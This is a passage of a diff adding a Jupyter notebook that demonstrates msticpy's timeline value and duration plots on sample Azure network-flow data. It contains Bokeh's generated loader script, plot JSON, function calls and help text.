`output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"5274\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"5274\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"cc632f7e-660e-49d9-b249-6ba7363e3c1b\" data-root-id=\"5276\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"4d7b82ff-b3c2-4de0-9f71-ed706cd2320c\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"5287\"}],\"center\":[{\"id\":\"5290\"},{\"id\":\"5294\"},{\"id\":\"5337\"}],\"height\":300,\"left\":[{\"id\":\"5291\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"5314\"},{\"id\":\"5342\"}],\"right\":[{\"id\":\"5365\"}],\"title\":{\"id\":\"5277\"},\"toolbar\":{\"id\":\"5301\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"5279\"},\"x_scale\":{\"id\":\"5283\"},\"y_range\":{\"id\":\"5281\"},\"y_scale\":{\"id\":\"5285\"}},\"id\":\"5276\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"end\":1550157557600.0,\"start\":1549962994400.0},\"id\":\"5279\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"5281\",\"type\":\"DataRange1d\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"5275\"},{\"id\":\"5295\"},{\"id\":\"5296\"},{\"id\":\"5297\"},{\"id\":\"5298\"},{\"id\":\"5299\"}]},\"id\":\"5301\",\"type\":\"Toolbar\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5299\",\"type\":\"PanTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"5340\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"5330\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"5308\"},\"major_label_policy\":{\"id\":\"5320\"},\"ticker\":{\"id\":\"5288\"}},\"id\":\"5287\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"5292\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"5291\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"5294\",\"type\":\"Grid\"},{\"attributes\":{\"overlay\":{\"id\":\"5300\"}},\"id\":\"5296\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"data_source\":{\"id\":\"5310\"},\"glyph\":{\"id\":\"5312\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5313\"},\"view\":{\"id\":\"5315\"}},\"id\":\"5314\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"label\":{\"value\":\"http\"},\"renderers\":[{\"id\":\"5314\"},{\"id\":\"5342\"}]},\"id\":\"5338\",\"type\":\"LegendItem\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"5325\"},{\"id\":\"5326\"},{\"id\":\"5327\"},{\"id\":\"5328\"},{\"id\":\"5329\"},{\"id\":\"5330\"},{\"id\":\"5331\"},{\"id\":\"5332\"},{\"id\":\"5333\"},{\"id\":\"5334\"},{\"id\":\"5335\"},{\"id\":\"5336\"}]},\"id\":\"5288\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"5308\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"5326\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"13.107.4.50\",\"8.249.241.254\",\"23.48.36.78\",\"23.223.3.100\",\"205.185.216.42\",\"8.253.45.249\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.81.240\",\"40.87.63.92\",\"40.80.145.38\",\"99.84.106.178\",\"23.3.13.106\",\"99.84.106.27\",\"23.45.180.234\",\"99.84.106.92\",\"72.21.81.240\",\"23.3.13.146\",\"23.3.13.112\",\"72.21.91.29\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.91.29\",\"72.21.91.29\",\"23.4.187.27\",\"205.185.216.42\",\"72.21.91.29\",\"72.21.91.29\",\"13.107.4.50\",\"23.48.36.47\",\"13.107.4.50\",\"23.45.180.121\",\"72.21.91.29\",\"173.194.61.40\",\"216.58.218.238\",\"72.21.81.240\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.81.240\",\"23.4.187.27\",\"72.21.81.240\"],\"FlowDirection\":[\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AACUXB+OdkIAgFxXMY52QgCACTg1jnZCAIAJODWOdkIAgAk4NY52QgCACTg1jnZCAIAJODWOdkIAgAk4NY52QgCACTg1jnZCAIDBQzWOdkIAgMFDNY52QgCAZy47jnZCAIBnLjuOdkIAgGcuO452QgCAZy47jnZCAIBnLjuOdkIAgGcuO452QgCAZy47jnZCAIBnLjuOdkIAgHG1QI52QgCAa9lPjnZCAADeZVOOdkIAgH2mV452QgCA6/5ojnZCAICqWW2OdkIAgKpZbY52QgAATDp6jnZCAIComn6OdkIAAKknhY52QgAAqSeFjnZCAAAInoeOdkIAAAieh452QgAAnBqLjnZCAIAOoY+OdkIAgA6hj452QgAAfiSfjnZCAAB+JJ+OdkIAAIzao452QgAAjNqjjnZCAACQ/LmOdkIAAJD8uY52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[41]},\"FlowType\":[\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\"],\"L7Protocol\":[\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAA8D8AAAAAAADwPwAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAABAAAAAAAAACEAAAAAAAAAIQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[41]},\"color\":[\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\",\"#440154\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"5323\"},\"selection_policy\":{\"id\":\"5324\"}},\"id\":\"5310\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"x\":{\"field\":\"FlowStartTime\"},\"y\":{\"field\":\"TotalAllowedFlows\"}},\"id\":\"5341\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"5331\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"5312\",\"type\":\"VBar\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"5300\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"click_policy\":\"hide\",\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"5365\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"5319\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"5317\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis\":{\"id\":\"5287\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"5290\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"5324\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"5297\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"5323\",\"type\":\"Selection\"},{\"attributes\":{\"axis_label\":\"TotalAllowedFlows\",\"formatter\":{\"id\":\"5319\"},\"major_label_policy\":{\"id\":\"5317\"},\"ticker\":{\"id\":\"5292\"}},\"id\":\"5291\",\"type\":\"LinearAxis\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@FlowStartTime\":\"datetime\"},\"tooltips\":[[\"FlowDirection\",\"@FlowDirection\"],[\"FlowStartTime\",\"@FlowStartTime{%F %T.%3N}\"],[\"TotalAllowedFlows\",\"@TotalAllowedFlows\"],[\"FlowType\",\"@FlowType\"],[\"AllExtIPs\",\"@AllExtIPs\"],[\"L7Protocol\",\"@L7Protocol\"]]},\"id\":\"5275\",\"type\":\"HoverTool\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"5327\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"text\":\"Vbar and circle show zero gaps in data\"},\"id\":\"5277\",\"type\":\"Title\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"5333\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"5334\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"5298\",\"type\":\"SaveTool\"},{\"attributes\":{\"source\":{\"id\":\"5310\"}},\"id\":\"5343\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"5285\",\"type\":\"LinearScale\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"5325\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"5320\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"5283\",\"type\":\"LinearScale\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"5335\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"5329\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"5332\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5295\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"5328\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"5336\",\"type\":\"YearsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"5310\"},\"glyph\":{\"id\":\"5340\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5341\"},\"view\":{\"id\":\"5343\"}},\"id\":\"5342\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"5313\",\"type\":\"VBar\"},{\"attributes\":{\"items\":[{\"id\":\"5338\"}]},\"id\":\"5337\",\"type\":\"Legend\"},{\"attributes\":{\"source\":{\"id\":\"5310\"}},\"id\":\"5315\",\"type\":\"CDSView\"}],\"root_ids\":[\"5276\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"4d7b82ff-b3c2-4de0-9f71-ed706cd2320c\",\"root_ids\":[\"5276\"],\"roots\":{\"5276\":\"cc632f7e-660e-49d9-b249-6ba7363e3c1b\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "5276"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "display_timeline_values(\n",
+    "    data=az_net_flows_df[az_net_flows_df[\"L7Protocol\"] == \"http\"],\n",
+    "    group_by=\"L7Protocol\",\n",
+    "    title=\"Line plot can be misleading\",\n",
+    "    source_columns=[\n",
+    "        \"FlowType\",\n",
+    "        \"AllExtIPs\",\n",
+    "        \"L7Protocol\",\n",
+    "        \"FlowDirection\",\n",
+    "        \"TotalAllowedFlows\",\n",
+    "    ],\n",
+    "    time_column=\"FlowStartTime\",\n",
+    "    y=\"TotalAllowedFlows\",\n",
+    "    legend=\"right\",\n",
+    "    height=300,\n",
+    "    kind=[\"line\", \"circle\"],\n",
+    "    range_tool=False,\n",
+    ")\n",
+    "display_timeline_values(\n",
+    "    data=az_net_flows_df[az_net_flows_df[\"L7Protocol\"] == \"http\"],\n",
+    "    group_by=\"L7Protocol\",\n",
+    "    title=\"Vbar and circle show zero gaps in data\",\n",
+    "    source_columns=[\n",
+    "        \"FlowType\",\n",
+    "        \"AllExtIPs\",\n",
+    "        \"L7Protocol\",\n",
+    "        \"FlowDirection\",\n",
+    "        \"TotalAllowedFlows\",\n",
+    "    ],\n",
+    "    time_column=\"FlowStartTime\",\n",
+    "    y=\"TotalAllowedFlows\",\n",
+    "    legend=\"right\",\n",
+    "    height=300,\n",
+    "    kind=[\"vbar\", \"circle\"],\n",
+    "    range_tool=False,\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-13T23:24:49.623044Z",
+     "start_time": "2019-09-13T23:24:49.612030Z"
+    }
+   },
+   "source": [
+    "## Documentation for display_timeline_values\r\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Help on function display_timeline_values in module msticpy.nbtools.timeline:\n",
+      "\n",
+      "display_timeline_values(data: pandas.core.frame.DataFrame, value_col: str = None, time_column: str = 'TimeGenerated', source_columns: list = None, **kwargs) -> bokeh.models.layouts.LayoutDOM\n",
+      "    Display a timeline of events.\n",
+      "    \n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    data : pd.DataFrame\n",
+      "        DataFrame as a single data set or grouped into individual\n",
+      "        plot series using the `group_by` parameter\n",
+      "    time_column : str, optional\n",
+      "        Name of the timestamp column\n",
+      "        (the default is 'TimeGenerated')\n",
+      "    value_col : str\n",
+      "        The column name holding the value to plot vertically\n",
+      "    source_columns : list, optional\n",
+      "        List of default source columns to use in tooltips\n",
+      "        (the default is None)\n",
+      "    \n",
+      "    Other Parameters\n",
+      "    ----------------\n",
+      "    x : str, optional\n",
+      "        alias of `time_column`\n",
+      "    y : str\n",
+      "        an alias for `value_col`\n",
+      "    title : str, optional\n",
+      "        Title to display (the default is None)\n",
+      "    ref_event : Any, optional\n",
+      "        Add a reference line/label using the alert time (the default is None)\n",
+      "    ref_time : datetime, optional\n",
+      "        Add a reference line/label using `ref_time` (the default is None)\n",
+      "    ref_label : str, optional\n",
+      "        A label for the `ref_event` or `ref_time` reference item\n",
+      "    group_by : str\n",
+      "        (where `data` is a DataFrame)\n",
+      "        The column to group timelines on\n",
+      "    legend: str, optional\n",
+      "        \"left\", \"right\", \"inline\" or \"none\"\n",
+      "        (the default is to show a legend when plotting multiple series\n",
+      "        and not to show one when plotting a single series)\n",
+      "    yaxis : bool, optional\n",
+      "        Whether to show the yaxis and labels\n",
+      "    range_tool : bool, optional\n",
+      "        Show the the range slider tool (default is True)\n",
+      "    height : int, optional\n",
+      "        The height of the plot figure\n",
+      "        (the default is auto-calculated height)\n",
+      "    width : int, optional\n",
+      "        The width of the plot figure (the default is 900)\n",
+      "    color : str\n",
+      "        Default series color (default is \"navy\"). This is overridden by\n",
+      "        automatic color assignments if plotting a grouped chart\n",
+      "    kind : Union[str, List[str]]\n",
+      "        one or more glyph types to plot., optional\n",
+      "        Supported types are \"circle\", \"line\" and \"vbar\" (default is \"vbar\")\n",
+      "    hide : bool, optional\n",
+      "        If True, create but do not display the plot.\n",
+      "        By default, False.\n",
+      "    ref_events : pd.DataFrame, optional\n",
+      "        Add references line/label using the event times in the dataframe.\n",
+      "        (the default is None)\n",
+      "    ref_time_col : str, optional\n",
+      "        Add references line/label using the this column in `ref_events`\n",
+      "        for the time value (x-axis).\n",
+      "        (this defaults the value of the `time_column` parameter or 'TimeGenerated'\n",
+      "        `time_column` is None)\n",
+      "    ref_col : str, optional\n",
+      "        The column name to use for the label from `ref_events`\n",
+      "        (the default is None)\n",
+      "    ref_times : List[Tuple[datetime, str]], optional\n",
+      "        Add one or more reference line/label using (the default is None)\n",
+      "    \n",
+      "    Returns\n",
+      "    -------\n",
+      "    LayoutDOM\n",
+      "        The bokeh plot figure.\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "help(display_timeline_values)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Timeline Durations\r\n",
+    "\r\n",
+    "Sometimes it's useful to be able to group data and see the start and ending\r\n",
+    "activity over a period. The timeline durations plot gives you\r\n",
+    "that option. It creates bands for the start and ending duration of\r\n",
+    "each group, as well as the locations of the individual events.\r\n",
+    "\r\n",
+    "Note, that unlike other timeline controls you *must* specify a\r\n",
+    "`group_by` parameter. This defines the way that the data is grouped\r\n",
+    "before calculating the start and end of the events within that group.\r\n",
+    "`group_by` can be a single column or a list of columns.\r\n",
+    "\r\n",
+    "Durations are shown using boxes with individual events\r\n",
+    "superimposed (as diamonds).\r\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"5492\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      